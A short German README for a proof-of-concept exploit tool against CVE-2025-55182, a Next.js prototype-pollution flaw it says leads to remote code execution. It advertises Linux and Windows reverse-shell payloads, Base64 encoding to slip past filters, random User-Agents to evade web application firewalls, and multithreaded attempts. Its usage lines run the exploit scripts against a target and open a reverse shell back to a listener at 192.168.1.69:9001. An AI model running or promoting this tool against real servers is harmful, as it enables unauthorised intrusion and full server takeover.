
Poc für CVE-2025-55182
CVE-2025-55182 ist eine kritische Prototype-Pollution-Schwachstelle in Next.js, die RCE durch unsachgemäße Eingabebereinigung im Request-Handling-Mechanismus des Frameworks ermöglicht. Das Ganze passiert, weil Next.js JSON-Objekte wie ein ahnungsloser Neuling vertraut.
1) Prototype Pollution im Request-Parsing: Next.js bereinigt Objekte, die die Prototyp-Kette verschmutzen können, nicht richtig.
2) Unsichere Deserialisierung: Das Framework erlaubt es JSON-Objekten, die Basis-Objekt-Prototypen zu modifizieren.
3) RCE über child_process durch Verschmutzung der Prototyp-Kette: Sobald der Prototyp verschmutzt ist, können wir die Logik kapern und den Server dazu bringen, Dinge auszuführen.
npm create [email protected] vuln
1) Reverse-Shell-Payloads: Linux/Win Reverse-Shells
2) Base64-Kodierung, um Filter zu umgehen
3) Automatische Betriebssystemerkennung
4) Zufällige User-Agents zur Umgehung von WAFs
5) Wiederholungsschleifen bei Fehlschlag mit exponentiellem Backoff
6) Multi-Threading für gleichzeitige Exploit-Versuche zur Zuverlässigkeit
python exp_v2.py target 192.168.1.69 9001 --base64
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3
python exploit.py target.com 192.168.1.69 9001 --no-spoof